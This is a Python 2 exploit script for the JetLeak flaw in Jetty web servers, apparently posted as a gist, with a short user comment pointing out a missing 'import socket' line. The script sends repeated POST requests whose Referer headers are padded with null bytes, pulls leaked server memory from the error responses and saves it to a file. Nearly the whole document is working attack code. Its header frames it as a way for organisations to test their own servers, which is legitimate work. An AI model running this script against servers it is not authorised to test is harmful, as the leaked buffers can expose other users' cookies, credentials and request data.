Exploit for Jetleak as seen in https://hackerone.com/reports/143935

jetleak.py

import httplib, urllib, ssl, string, sys, getopt
import datetime
from urlparse import urlparse

f = open('jetleak_' + datetime.datetime.now().strftime('%Y%m%d_%H_%M') + '.txt', 'w')

'''
Author: Gotham Digital Science, modified by molejarka
Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether 
		 their Jetty web server versions are vulnerable to JetLeak. Currently, this script does 
		 not handle sites with invalid SSL certs. This will be fixed in a future iteration.
'''

if len(sys.argv) < 3:
	print("Usage: jetleak.py [url] [port]")
	sys.exit(1)

url = urlparse(sys.argv[1])
if url.scheme == '' and url.netloc == '':
	print("Error: Invalid URL Entered.")
	sys.exit(1)

port = sys.argv[2]

conn = None

if url.scheme == "https":
	conn = httplib.HTTPSConnection(url.netloc + ":" + port)
elif url.scheme == "http":
    conn = httplib.HTTPConnection(url.netloc + ":" + port)
else: 
	print("Error: Only 'http' or 'https' URL Schemes Supported")
	sys.exit(1)
	
b = 4

for j in range(1,350):

	for i in range(1,2):
		try:
			results = []
			
			x = chr(0) * (1 + b * j)
			headers = {"Referer": x}
			conn.request("POST", "/", "", headers)
			r1 = conn.getresponse()

			r1.read()
			results.append(r1.reason[221:-64])
		
			results = list(set(results))
			for r in results:
				print(r)
				f.write(r + '\n')

		except socket.error:
			if url.scheme == "https":
				conn = httplib.HTTPSConnection(url.netloc + ":" + port)
			elif url.scheme == "http":
				conn = httplib.HTTPConnection(url.netloc + ":" + port)
			
				
f.close()

should add:
import socket

without it, code generating error.

huge thank you for this exploit.